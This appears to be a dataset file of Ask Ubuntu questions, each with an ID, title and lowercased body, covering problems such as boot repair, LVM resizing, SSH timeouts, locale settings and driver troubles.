429345	set `` ubuntu-2d '' default session for ltsp clients	i want to set `` ubuntu-2d '' as a default session for ltsp clients . i already added to the lts.conf file [ default ] ldm_session= '' gnome-session -- session=ubuntu-2d '' but with no success . any ideas ?
429346	use locate to find name in directories only	if i lost a file i use locate a lot . works perfectly and with grep you can quickly find back what you looked for . however , often it generates a lot of output which is not always easy to filter . one instance is when searching for a lost dir when the name is used in the base of a lot of entries . try searching all bin dirs for example . locate by itself has no option to only search for directory type entries , but it has a option to parse a regexp . unfortunately i am no high flyer on regexp . what would the regexp be to parse to locate to show 1 occurrence of every bin dir , or can i better use a different pipe ?
429348	ubuntu 13.10 64-bit install failed to execute /init ; boot repair log	i decided to try ubuntu 64-bit on some great hardware that 's been running several ubuntu versions fine for more than a year . i put ubuntu 13.10 64-bit via unetbootin on my usb key , installed without problem and rebooted . the boot process halts with an error message similar to : failed to execute /init no init found try passing init= option to kernel see linux documentation/init.txt for guidance http : //paste.ubuntu.com/7032869/ any help you can provide is very much appreciated , daleemoore @ gmail.com
429350	ca n't boot windows 8 after removing ubuntu 14.04	i know this topic is already on ubuntuask but i did n't find a solution to my problem in particular yet . i installed ubuntu 14.04 in dual boot with my preinstalled windows 8 ( i 'm on a mbr disk ) .the thing is i removed ubuntu directly form windows by erasing the partition . but grub is still there and i get an error when i start my computer : `` repair grub no such device '' . i tried many things already to get it back such as using boot repair . i know i could also try to restore windows with my recovery usb . but the problem is i do n't have a recovery partition so i never was able to create such a key . is there any way for me to get back to windows bootloader form grub rescue ? or to use the ubuntu live cd to get it back ? thank you all in advance
429355	unable to mount / access internal hard disks	i upgraded from 13.04 to 13.10 . i have a dual boot with win 7 , which works perfectly well . after the upgrade , even as admin i am unable to mount my interal hard disks . ( when i log in as a regular user i am asked to authenticate ) the drive is shown , however on clicking it gives a message - `` this location could not be displayed . '' with the added info 'you do not have the permissions necessary to view the contents of `` data '' . '
429357	custom icon for .desktop file not appearing	i intend to change from windows 7 to ubuntu . there are some icons on the desktop i would like to use on ubuntu . i converted these icons to *.png 64*64 pixel and put in /home/user/icons then i use the terminal : sudo gedit to : [ desktop entry ] name=account exec=/home/user/jameica/jameica.sh icon=/home/user/icons/ico_account.png terminal=false type=application i store this file to /usr/share/application with the name account.desktop the desktop entry is created , but not with the desired icon . what is wrong ?
429362	`` dummy output '' and no sound when update to the latest hda drivers	my system keeps asking for an hda drivers update , but everytime i update those drivers to the latest version , sound disappers and only `` dummy output '' is available as a choice in the audio settings panel . everytime this thing happens , i must re-install an older version of the hda drivers that actually works , but i really do n't understand why i ca n't update those freakin ' drivers ! xd could you please help me with this issue ? thank you .
429365	dongle does not connect in one attempt	my docomo 3g dongle does n't connect in first connect . on first connect when i do lsusb . it shows following output : bus 002 device 003 : id 19d2:2000 zte wcdma technologies msm mf627/mf628/mf628+/mf636+ hsdpa/hsupa once i removed that and reconnect , then it shows in the netowrk connections list under mobile broadband section . and on lsusb output changes to : bus 002 device 005 : id 19d2:2003 zte wcdma technologies msm however , it does not connect to the internet . i need to delete the previous connection from netowrk connections and need to create a new mobile broadnand connection then only it starts . i am tired of these steps every time i start/restart my laptop .
429366	virsh kvm domain is marked as autostart ... does n't come up after restarting windows	i have kvm and virsh installed . when i restart windows inside the vm , the vm does not come back up without issuing a virsh start command . i found this http : //www.cyberciti.biz/faq/rhel-centos-linux-kvm-virtualization-start-virtual-machine-guest ... at the end , it says also , make sure /etc/init.d/libvirtd service is stared on boot : chkconfig libvirtd on ubuntu uses upstart though , not chkconfig . can anyone help me with the equivalent command ?
429370	unlocaling kubuntu	i have installed kubuntu 13.10 as i am living in israel , every app that i install is immediatly in hebrew which is very annoying . i always prefer my applications to be in english and just have the ability to write in hebrew . how do i change it that everything will stay in english ?
429372	javascript console	i have installed ubuntu 12.04 on my acer aspire one , model : kav60 and it works fine . the problem i have is just that every time i write something in google chrome or mozilla firefox a developer tool or a javascript console window pops up and my browser hangs up or freezes . when i type shift + m in google chrome this happens or when i type j as well . is there a terminal command that prevents this or is there another solution ?
429373	how to config xdebug in ubuntu 12.04	i am trying to enable autostart for xdebug in php5 so it stops on errors when phpstorm debug is on . problem is i cant find the [ xdebug ] section in /etc/php5/apache2/php.ini . i know that xdebug is on from my phpinfo . also tried /etc/php5/apache2/conf/20-xdebug.ini but contains a single line , no config params here either .
429375	can i add a ppa to a custom sources.list ?	is there any way to add a ppa to a specific sources.list ? add-apt-repository by default adds new ppa to /etc/sources.list , i want to add a ppa to mysources.list
429379	using server as controlled switch	i have an ubuntu server with 3 nics installed . i have two classrooms . i want to control the two classrooms with iptables separately . my problem is that i ca n't ( bridge eth0 to eth1 ) and ( bridge eth0 to eth2 ) at the same time . i 'm reading all articles on the internet since a month . ca n't get it to work . so what i want is simply something like this : eth0 > > > eth1 = br1 eth0 > > > eth2 = br2 so this way the 2 classrooms wo n't be detached from the outer network and the central dhcp . and i can write iptable rules to br1 and br2 separately . ps : dhcp is not an option . i need the subnet to stay the way it is .
429382	installing ubuntu 13.10 within windows	i want to install ubuntu 13.10 or ubuntu 12.04 within windows ( the installation in which one has the option to uninstall ubunty from the control panel like any other windows software ) . i own a windows 8 pc with pre-installed windows 8 so it had only one drive c. my question is can i install ubuntu 13.10 or 12.04 in the previoisly said way on my c drive whilst keeping my windows installation and all.other files on c unharmed ?
429383	locale has no effect	i 've edited /etc/default/locale to look like this : lang= '' en_ca.utf-8 '' language= '' en_ca : en '' lc_numeric= '' en_ca.utf-8 '' lc_time= '' en_dk.utf-8 '' lc_monetary= '' en_ca.utf-8 '' lc_paper= '' en_ca.utf-8 '' lc_identification= '' en_ca.utf-8 '' lc_name= '' en_ca.utf-8 '' lc_address= '' en_ca.utf-8 '' lc_telephone= '' en_ca.utf-8 '' lc_measurement= '' en_ca.utf-8 '' unfortunately , it seems that en_dk did nothing , because my thunderbird date/times still look like 14-03-03 04:02 pm . so how do i get this to kick in ?
429385	upgrade openssl on ubuntu 12.04	i wanted to upgrade openssl to 1.0.1 on an ubuntu 12.04 system . i have noticed that an apt-get upgrade openssl does not end up upgrading openssl . is the newer openssl supported on ubuntu ? i have also tried compiling from source . the compilation works but i can not find out how to replace the built-in openssl ( 1.0.0 ) with the newer one ( 1.0.1 ) . compiling from source gets me the newer version working along with the older version - i need to replace the older version with the newer version . my reason behind this need is to make freeswitch compile with the newer version because the latest freeswitch source is not compatible with openssl 1.0.0 and there seems to be no make configuration in freeswitch to point it towards the path for the new openssl . ( so it stubbornly keeps using the older version and failing to work ! ) thanks is advance . any help would be greatly appreciated .
429386	software updates through proxy server ?	we are using squid proxy server to access internet when we are opening browser it ask to specify username and password to enter it to it then how can we able to update the system by this proxy server
429387	how do i list all package names in a specific category using terminal ?	how do i list all package names in one section ? if , for example , i want to list all applications in section `` web '' , which command do i need to input ?
429389	intel graphics hash sum mismatch	this just came up today . i looked trough the similar posts , but nothing seems to work for me . w : failed to fetch gzip : /var/lib/apt/lists/partial/download.01.org_gfx_ubuntu_13.10_main_dists_saucy_main_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . i have ran sudo rm -r /var/lib/apt/lists/partial/* & sudo rm -r /var/lib/apt/lists/* no change , same message appears when apt-get update . i re-added the sig keys from https : //01.org/linuxgraphics/downloads/2013/intelr-graphics-installer-1.0.3-linux and removed/reinstalled the graphics installer . what am i missing ? edit : i also tried changing the download server from the software center , it throws the error : failed to download repository information check your internet connection . details shows the same hash sum mismatch error .
429390	compiz frequently resetting `` initiate window move '' shortcut key back to defaults	since i am using quiet a few applications where i need alt+leftmouse shortcut to be available - i installed compizconfig settings manager and changed the shortcut under `` enable move window '' - `` initiate window move '' from alt+button1 to alt+super+button1 . all works great for some time.. 2-5 days , after what i find this shortcut is set back to its original value alt+button1 . i change it manually again .. and again - some time it works like that until the magic event and boom - it has his default value back again . wondering at this point - how to set it super-permanent ... and out of curiosity - what events might reset it to its default value ? this happened in 13.04 , continues to happen in 13.10 on three different computers . so - share your wisdom please ! : ) thank you for your time .
429391	about ask ubuntu lens	i have downloaded ask ubuntu lens from the ubuntu software center for ubuntu 12.04 and installed it . then i logged out and logged in to use that software but when i searched in the dash home icon was not there . please somebody help
429394	wifi does n't work on ubuntu	i have a dual boot laptop ( np540u3c ) with windows 8 and ubuntu . the issue is that every time i restart my computer i 'd have to restart my router in order to connect to the internet . this does not happen with my other devices , or windows system . please help me ... here 's the the result when i ran ifconfig : eth0 link encap : ethernet hwaddr 50 : b7 : c3:0a : d3 : ae up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2141 errors:0 dropped:0 overruns:0 frame:0 tx packets:2141 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:329101 ( 329.1 kb ) tx bytes:329101 ( 329.1 kb ) wlan0 link encap : ethernet hwaddr c8 : f7:33:9c:66:70 inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :caf7:33ff : fe9c:6670/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:101717 errors:0 dropped:0 overruns:0 frame:0 tx packets:46839 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:122719994 ( 122.7 mb ) tx bytes:7840981 ( 7.8 mb ) i tried the following sudo ifconfig wlan0 down ; sudo ifconfig wlan0 up but it still does n't work =/
429396	nvidia settings wo n't take	new user here , running 12.04 . i have my pc connected to my 50 '' lg plasma and am experiencing some edge clipping . i just installed my nvidia drivers but when i go in and update the underscan setting and hit apply , nothing changes . i receive the following terminal error : the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 606 error_code 2 request_code 155 minor_code 25 ) any insight ?
429397	ubuntu installation issue side by side windows 8.1	i have pre-installed windows 8.1 and i installed ubuntu 13.10 . this is what i see - boot mode - [ legacy ] boot priority - [ uefi ] issue here is when i restart my computer it does n't ask for windows or ubuntu selection . and start the windows 8.1 . when i change the configuration to boot mode - [ legacy ] boot priority - [ legacy ] purple screen comes up to choose ubuntu or windows . when i choose ubuntu it works perfectly fine . after login to ubuntu . krunal @ krunal-lenovo-ideapad-u530-touch : ~ $ [ -d /sys/firmware/efi ] & & echo `` efi boot on hdd '' || echo `` legacy boot on hdd '' legacy boot on hdd krunal @ krunal-lenovo-ideapad-u530-touch : ~ $ krunal @ krunal-lenovo-ideapad-u530-touch : ~ $ sudo blkid /dev/sdb1 : label= '' winre_drv '' uuid= '' 309c4cd59c4c96ee '' type= '' ntfs '' /dev/sdb2 : label= '' system_drv '' uuid= '' 684f-4292 '' type= '' vfat '' /dev/sdb3 : label= '' lrs_esp '' uuid= '' 3854-3e3c '' type= '' vfat '' /dev/sdb5 : label= '' windows8_os '' uuid= '' aad0579bd0576c97 '' type= '' ntfs '' /dev/sdb6 : label= '' lenovo '' uuid= '' 8654250a5424fe95 '' type= '' ntfs '' /dev/sdb7 : label= '' pbr_drv '' uuid= '' 5e625cb7625c961d '' type= '' ntfs '' /dev/sdb9 : uuid= '' 9e762872-601b-4518-91d2-7826bc488b61 '' type= '' ext4 '' /dev/sdb10 : uuid= '' 3562b3f6-6f08-45c7-b16d-41a98712a1a6 '' type= '' swap '' edit this is what i see in boot manager now . is this correct ? but when i click windows it does n't understand and show messages and stops there . after that i have to restart my computer by pressing power button .
429399	red exclamation mark when attempting to resize hdd - gparted	i 'm unable to shrink windows partition using gparted live cd . the partition filesystem is ntfs . windows 7 is on it and boots fine . gparted information dialog gives the following : status - unmounted error - the disk has at least 19 bad sectors run chkdsk /f /r on windows and reboot it twice ! then you can resize ntfs safely by additionally using the -- bad-sectors option of ntfsresize the cause might be a missing software package . the following list of software packages is required for ntfs file system support : ntfsprogs / ntfs-3g . i 've scanned for disk errors and rebooted twice as suggested above . how do i get rid of this red exclamation mark ? ( the red exclamation mark looks like this ) . thanks in advance .
429405	ubuntu `` server '' help	i 've setup an ubuntu server ( i plan on using it as one ) , and i have already set it up to start in command line so it runs more efficiently . i still want to have access to the gui if i need it , because i am fairly new to this . basically , i want to make it so that i can press the power button , and when it starts up , i want to be able to access the command line from my windows machine without having to put in the root password into the linux machine . i would still like it to be locked when i access it from the windows machine though , for security . i would also really like to start the gui if i absolutely need it for something , but since i have file access through the network , i do n't think i will be using it much . i need to know what i need to do with both my windows machine and my linux machine ( obviously ) , so if someone has a solution to all of these , that would be great . i also want the machine to run as efficiently as possible , so as long as i can control everything from my windows machine . thanks !
429412	my ubuntu 11.10 update manager is not working	why ubuntu software center is saying when i was trying install software '' the action would require the installation of packages from not authenticated sources '' . and also update manager is also not working . it says when i was trying to update partial upgrade '' error authenticating some packages '' please help me
429415	help on resizing my lvm partitions	i need help on resize two lvm partitions as i 'm afraid of loosing data . i 'm using ubuntu server 12.04 headless mode . lvs : root @ server : / # lvs lv vg attr lsize origin snap % move log copy % convert home lvg -wi-ao 27,94g root lvg -wi-ao 6,52g storage lvg -wi-ao 504,84g swap lvg -wi-ao 732,00m fdisk : root @ server : / # fdisk -l disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00067ea1 device boot start end blocks id system /dev/sda1 * 2048 585727 291840 83 linux /dev/sda2 587774 156301311 77856769 5 extended /dev/sda5 587776 156301311 77856768 8e linux lvm disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008c066 device boot start end blocks id system /dev/sdb1 2048 976771071 488384512 8e linux lvm disk /dev/mapper/lvg-root : 6996 mb , 6996099072 bytes 255 heads , 63 sectors/track , 850 cylinders , total 13664256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/lvg-root does n't contain a valid partition table disk /dev/mapper/lvg-swap : 767 mb , 767557632 bytes 255 heads , 63 sectors/track , 93 cylinders , total 1499136 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/lvg-swap does n't contain a valid partition table disk /dev/mapper/lvg-home : 30.0 gb , 29997662208 bytes 255 heads , 63 sectors/track , 3647 cylinders , total 58589184 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/lvg-home does n't contain a valid partition table disk /dev/mapper/lvg-storage : 542.1 gb , 542063460352 bytes 255 heads , 63 sectors/track , 65902 cylinders , total 1058717696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/lvg-storage does n't contain a valid partition table i want to shrink my /home lv partition and extent my /storage lv partition . what is the proper method to do this ? thanks
429417	no module named setuptools/ setuptools is already the newest version	so i am trying to get python suds on my ubuntu 12.04 lts machine , and when i put in sudo apt-get install python-setuptools i get the traceback importerror : no module named setuptools so i put in sudo apt-get install python-setuptools which gives this- python-setuptools is already the newest version . python-setuptools set to manually installed . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and when i run it again , i get the exact same traceback- importerror : no module named setuptools . does anyone know what could be happening ? the whole thing looks like this : shaunjl @ ubuntu : ~/documents/work/suds-0.4 $ sudo python setup.py install traceback ( most recent call last ) : file `` setup.py '' , line 21 , in < module > from setuptools import setup , find_packages importerror : no module named setuptools shaunjl @ ubuntu : ~/documents/work/suds-0.4 $ cd .. shaunjl @ ubuntu : ~/documents/work $ sudo apt-get install python-setuptools reading package lists ... done building dependency tree reading state information ... done python-setuptools is already the newest version . python-setuptools set to manually installed . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . shaunjl @ ubuntu : ~/documents/work $ cd suds-0.4/ shaunjl @ ubuntu : ~/documents/work/suds-0.4 $ sudo python setup.py install traceback ( most recent call last ) : file `` setup.py '' , line 21 , in < module > from setuptools import setup , find_packages importerror : no module named setuptools requested addition : shaunjl @ ubuntu : ~ $ sudo which python [ sudo ] password for shaunjl : /usr/local/bin/python shaunjl @ ubuntu : ~ $ sudo python -c 'import sys ; print sys.path' [ '' , '/usr/local/lib/python27.zip ' , '/usr/local/lib/python2.7 ' , '/usr/local/lib/python2.7/plat-linux2 ' , '/usr/local/lib/python2.7/lib-tk ' , '/usr/local/lib/python2.7/lib-old ' , '/usr/local/lib/python2.7/lib-dynload ' , '/usr/local/lib/python2.7/site-packages ' ] shaunjl @ ubuntu : ~ $
429418	rhythmbox midi error	when i open rhythmbox this program detect my midi files . when i want to install midi extension i see it : i have gnome graphical environment and i do n't know what can i do . sorry for the mistakes , i 'm only pole .
429422	virtual machine with desktop	i want to script an ubuntu virtualbox vm , with a deskop ui . i 'm stuck booting into gnome or xfce . i do n't just want to build from an iso but use a tool like vagrant or packer to build an image automatically based on a shell script . has anyone done this before and has references for me ? see : does ubuntu 12.04 lts 32-bit have graphic user interface ?
429423	telnet and opennig command prompt script in linux	i do n't have any major scripting experience and i am really confused about the script which i am working on it . i am using dynagen in linux and created a basic topology with two routers r1 ( fa0/0=10.1.1.1/port 2101 ) and r2 ( fa0/0=10.1.1.2/port 2102 ) . i managed to create a python script and run the routers , i can start and stop them and open consoles , i also can run them from putty and do the same tasks . i need an script to automatic telnet to my linux and prompt me for username and password /start routers/open command prompt of the device/save the current running configuration file in a folder/ . this what i came up for my 3th task so far , it telnet to my linux but does n't prompt me for username and password , it just print them , and i stuck with the rest . # ! /usr/bin/expect set timeout 20 spawn telnet x.x.x.x expect `` login : '' expect `` username : '' send `` user\r '' expect `` password : '' send `` pass\r '' ; interact appreciate any help .
429424	music files wo n't open with rhythmbox as default	i have ubuntu 13.10 with rhythmbox set as the default music player , but when i double left-click a music file ( all my files are wma ) from my music folder it launches rhythmbox , but does not automatically play the file . all i get is the rhythmbox library page , with the green arrowhead and 'not playing ' . i can play the/any file fine from within rhythmbox . why wo n't it automatically play the music file ?
429425	show this screen after login ubuntu 12.04	after login ubuntu show this screen for a few seconds . what is the problem ?
429426	online virus scanners for linux	can we scan the drive online to scan and remove the virus files ? if there where can i find them ? how to scan and remove the virus through online scanners ? thank you !
429428	does this seem to be an error or something else ? - upgrading ubuntu 13.04 to 13.10	i did try the upgrade through terminal using the below given command : sudo do-release-upgrade then it started downloading the required files . in between i could see the below lines also ( mostly ) : err http : //archive.ubuntu.com raring-backports/multiverse translation-en_us err http : //archive.ubuntu.com raring-backports/universe translation-en_us err http : //archive.ubuntu.com saucy/main translation-en_us err http : //archive.ubuntu.com saucy/multiverse translation-en_us err http : //archive.ubuntu.com saucy/restricted translation-en_us err http : //archive.ubuntu.com saucy/universe translation-en_us err http : //archive.ubuntu.com saucy-updates/main translation-en_us err http : //archive.ubuntu.com saucy-updates/multiverse translation-en_us err http : //archive.ubuntu.com saucy-updates/restricted translation-en_us err http : //archive.ubuntu.com saucy-updates/universe translation-en_us err http : //archive.ubuntu.com saucy-backports/main translation-en_us err http : //archive.ubuntu.com saucy-backports/multiverse translation-en_us err http : //archive.ubuntu.com saucy-backports/restricted translation-en_us err http : //archive.ubuntu.com saucy-backports/universe translation-en_us err http : //archive.ubuntu.com saucy-security/main translation-en_us err http : //archive.ubuntu.com saucy-security/multiverse translation-en_us err http : //archive.ubuntu.com saucy-security/restricted translation-en_us err http : //archive.ubuntu.com saucy-security/universe translation-en_us can anyone tell me what could be the issue ?
429429	what is the difference between installing software from terminal or via software center ?	i recently switched to ubuntu 12.04 lts 64-bit and i installed many essential softwares the terminal by using this command : sudo apt-get install < package_name > is there any difference in installing softwares through terminal or via software center ( i.e . does the actual working of installation varies ) ?
429430	unable to boot livecd on an atom n2600	recently purchased a jetway miniitx pc which contains an intel cedar n2600 atom processor . i 'm attempting to boot off a live usb with 13.10 64 bit ( i 've also tried 12.04 32 bit ) . it starts booting , then stops outputting to the monitor , causing it to go into standby . i 've tried with nomodeset , no difference .
429432	ubuntu server can access the internet , but i ca n't connect to it on the local network	i have an old 32-bit laptop running ubuntu server 12.04 . it 's connected to my wifi , and it 's always worked perfectly fine - i 've been able to ssh into it and stuff . after a reboot about a day ago , though , i find myself unable to ssh into the machine : $ ssh user @ 192.168.0.15 ssh : connect to host 192.168.0.15 port 22 : operation timed out running sudo service ssh status shows that the ssh server is indeed running : ssh start/running , process 942 i know that the ip of the machine is 192.168.0.15 , as ifconfig ( running on the machine itself ) shows : eth1 link encap : ethernet hwaddr 00:13 : ce : de:32:48 inet addr:192.168.0.15 bcast:192.168.0.255 mask:255.255.255.0 ... i 've tried ssh'ing into it from other machines , and it always times out . i 'm using an airport time capsule ( newest version ) as my main router , but that should n't matter as it 's always worked before . also of note is that i can ping , for example , google.com and receive good packets back . i can also wget things . as far as i can see , the machine has normal access to the internet . i 've poked around the internet looking for solutions , and i came across one that suggested that it might be a firewall issue . however , sudo iptables -l -n shows nothing : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination the server is also running apache , and i ca n't reach that either from any other machine on the local network . i can , however , ping the server from the server itself ( ping 192.168.0.15 ) does anyone have any ideas ?
429433	pinch-zoom on asus ux302lg touchscreen	i am using ubuntu 14.04 . the system only recognizes multitouch tapping like 3 fingers for move window , 4 fingers for open dash , but no mutitouch-gesture that involves holding the fingers on the screen . is there a way to activate multitouch gestures like pinch-zoom or rotate on the touchscreen of an asus-notebook ?
429434	windows 8.1 x64 and ubuntu 14.04	so i want to install ubuntu 14.04 to my computer . so i created a live usb and it does work . i selected the dev5 for the installation ( dev 5 is ext2 and have a enough space . ) magically my computer restarted itself . and my windows are not working . i think i will move on to ubuntu . so i tried to install again . finally i 've got the problem . the ubuntu is n't completely installed into my computer yet . : until now , i do n't longer have any operating system ( that 's what my computer said ) .
429435	accidentally removed touchpad psmod	i 'm running ubuntu 13.10 on my 2013 asus g75vw ( which came preinstalled with windows 8 , now with 8.1 ) . i noticed that the second mouse button was n't registering at all , but everything else about the mouse was fine , including the scroll wheel ; the touchpad button was the only way i could right-click . i checked the mouse settings , but there was nothing . i 'm very new to ubuntu and i 'm not as computer-savvy as i 'd like to be . i found the advice from the this answer , and entered both of those commands : echo options psmouse proto=exps > /etc/modprobe.d/psmouse.conf rmmod psmouse & & modprobe psmouse just like the person said in their first edit , there are no longer any touchpad settings , and my mouse is still without a right-click . the touchpad will move the cursor , but that 's it ; it ca n't scroll or register multiple touches . is there a way to reinstall the drivers for the touchpad , and can someone tell me how i should add functionality for the mouse ?
429436	does periscope work anymore ?	i tried testing periscope on 3 french language movies that i know have english subtitles and it gave me no results . is periscope dead and abandoned by its author ? can it be fixed ? i sent the author an email and never heard from him ... .
429438	ubuntu 13.10 share non-os drive with windows	i 'm a total noob . i 've got a hp microserver with ubuntu 13.10 desktop installed . i 've got a 250gb hard drive with the os on there , and a 3tb drive i 'd like to share with windows . i 've managed to use samba to share a folder in home with no problems , but on the 3tb drive i 'm having no joy at all , just an unable to connect message . does anyone have any ideas on this ? thanks
429439	w540 overheating in ubuntu 13.10 but now windows *	i have ubuntu 13.10 64 bit installed with windows 8.1 64 bit on my lenovo thinkpad w540 and has a nvidia gpu with optimus but i have not installed drivers to enable it yet . i am using the cpufreq indicator to increase battery life . when running ubuntu on my computer the computer is a lot warmer than when in windows , even when i only have firefox and a text editor open . is there anyway to lower the heat of my laptop in ubuntu ?
429444	ubuntu 13.10 on dell inspirion n5010 : problems with bluetooth and brightness	i install ubuntu 13.10 64bit on my dell n5010 laptop and i have also installed proprietary drivers for my ati radeon hd5650 and wireless card . i have noticed that ubuntu did n't recognized my bluetooth , because i ca n't find it in bluetooth settings and there is no indicator in the tray . can you tell me if it is possible to activate bluetooth somehow ? after i typed rfkill list all in terminal i did n't get anything that is connected with bluetooth ( only wlan ) . beside that , i have also noticed that after i installed ati radeon drivers ( fglrx ) i ca n't change brightness of my screen . is it possible to fix this issue ? i tried with grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' but it did n't work . i have tried to find solution but i did n't have much luck .
429447	can i access ubuntu ports using a virtual machine ?	i 'm new to the server side of ubuntu . i 'm trying to use ubuntu as a host for my online coding platform and coaching website . i have set up a ubuntu server on a virtual machine and have installed some software required for my virtual programming lab . i have followed the instruction outlined here in order to produce the server . i am trying to access ports on the virtual machine from my virtual programming lab install . my question is essentially , how from my server install on a virtualbox on mac osx do i find the url and port such as http : // servername : port if i can find this , i am able to point the website with the virtual programming lab to the server so that processing can be handled . i am using a standard wifi home connection .
429448	multitouch on dell inspiron 7537	has anyone been able to get trackpad multitouch gestures working with a dell inspiron 7537 ? i 've tried synclient to change values in synaptics config but not having much luck . i 'm running ubuntu 14.04 and have n't had much luck with touchegg or modifying synaptics config with synclient . two finger scrolling works fine but i 'm looking for a few other features ( 3-finger swipe for workspaces , palm sensitivity , one-finger click/hold and second-finger drag -- - similar to osx functionality on macbook pros ) . i 've read through a couple of similar postings here but have n't had much luck with implementation . looking to see if someone has specifically had any luck on the same platform ( 7537 ) ... thanks
429449	how to move one button from the left corner of the top bar on ubuntu ?	i 'm trying discover the name of that button that is on the left corner of the top bar on ubuntu . it has these items : `` about this computer '' and `` users session '' . what is the name of this button ? i want to move it to the left corner of the bar .
429450	how to install a java program from source	how i can install tubemaster++ from sourceforge ?
429452	live view plug-in for ubuntu	i have ubuntu version 12.10 and i want to know where to download the plugin for live view of hikvision dvr/ipc/encoder for mozilla or chrome . any help ?
429460	unable to login to ubuntu server via ssh	[ jithin @ landing000 ~ ] $ ssh -vvv -i xxxxxxxx.pem ubuntu @ xx.xx.xx.xxx openssh_4.3p2 , openssl 0.9.8e-fips-rhel5 01 jul 2008 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to xx.xx.xx.xxx [ xx.xx.xx.xxx ] port 22 . its getting stuck at this position . its not coming up even after rebooting the server .
429465	is gnome-calendar usable , and how do i use it ?	i just found this : https : //wiki.gnome.org/design/apps/calendar which seems nice ! is this something that i can use ? how do i install it ?
429468	kernel panic : not syncing : vfs unable	i am using ubuntu 12.04 lts and have been using it for a while . i just rebooted today and got this error : kernel panic : not syncing : vfs unable to mount root fs on unknown_block ( 0,0 ) ` here is a screen shot the error . i used the boot repair disk and tried to fix it but it did not work . here is there result of that results . i am at a loss as to how to fix this . thanks for any help .
429471	how do you load usc image in virtualbox for mac ?	i 'm attempting to set up my ubuntu server cloud image before porting it to an amazon ami . realizing that i ca n't load an .img as a disk to a vm in virtualbox ( 4.3.8 ) i 've tried a few ways of converting it : renaming it to iso - disk unreadable vboxmanage convertdd usc.img usc.vdi - disk unreadable vboxmanage convertfromraw usc.img usc.vdi - starting vm produces `` fatal : no bootable medium found ! system halted . suggestions ?
429475	edubuntu installation setup fail	i 'm having too many problems with my project . let me explain it . i have just bought a brand new hp proliant ml310e gen8 v2 server with 32 mb of ram on a raid 1 system ( 3tb + 3tb ) to deploy an edubuntu on a pxe environment . firstly , when i began the installation on my server using the hp dynamic smart array b120i raid controller , the wizard detected two drives , and not the one logical volume i created . i decided to install in the first drive . everything looks okay until when i rebooted my computer that grub rescue prompt appeared with : error : out of disk grub rescue no way to go forward . i have tried this : https : //wiki.edubuntu.org/raid but it did n't work at all . so i decided to destroy my array . use single drive and once i get installed my edubuntu system just make a software raid 1 , but ... again the same error : error : out of disk grub rescue i also tried grub rescue disk without any result . i 'm really lost , and the only thing i do is loose my time . i would appreciate any help or , if anybody had the same problem with this hp server and got the solution it would be great if shares the solution here for all us . regards , jose manuel alfonso
429480	how to improve the sound quality of an mp3 speech file ?	i have an old mp3 recording of a talk once given by me ( recorded by an old-fashioned mp3-player ) . it has too low voice , too much noise , and too much crackling . is there an application with which i can easily ( i.e. , without going too deep into physics ) improve the sound quality ?
429481	how to launch a newly installed program	i have just downloaded and installed google chrome for linux , using software center . how do i now run the browser ? this was simple in windows - the program would typically be appended to the start menu , but there is no such thing in ubuntu . i 've noticed that stuff related to chrome has been installed in the /opt/ directory , but i can not find the equivalent to a .exe that would launch the browser .
429491	what does it mean that lubuntu and ubuntu precise pangolin have different `` supported until '' dates ?	ubuntu and lubuntu have different `` supported until '' dates for precise pangolin ( since ubuntu have lts releases , but lubuntu does not ) . what exactly does this mean , for me as a user , if i have lubuntu installed , given that both distros use the same apt repository ? â will i not get security updates for lubuntu-related packages after april 2013 ? if so , which packages are those ? or are there any other consequences ? p.s . ubuntu precise pangolin is supported until april 2017 , while lubuntu precise pangolin is supported until october 2013 . edit : added the bold text . edit 2 : i 'm wondering what updates etc . i 'll get be on a lubuntu system after october 2013 . ( given that both distros use the same apt repo , and that apt repo will continue to be updated until mainline ubuntu is no longer supported , in april 2017 . )
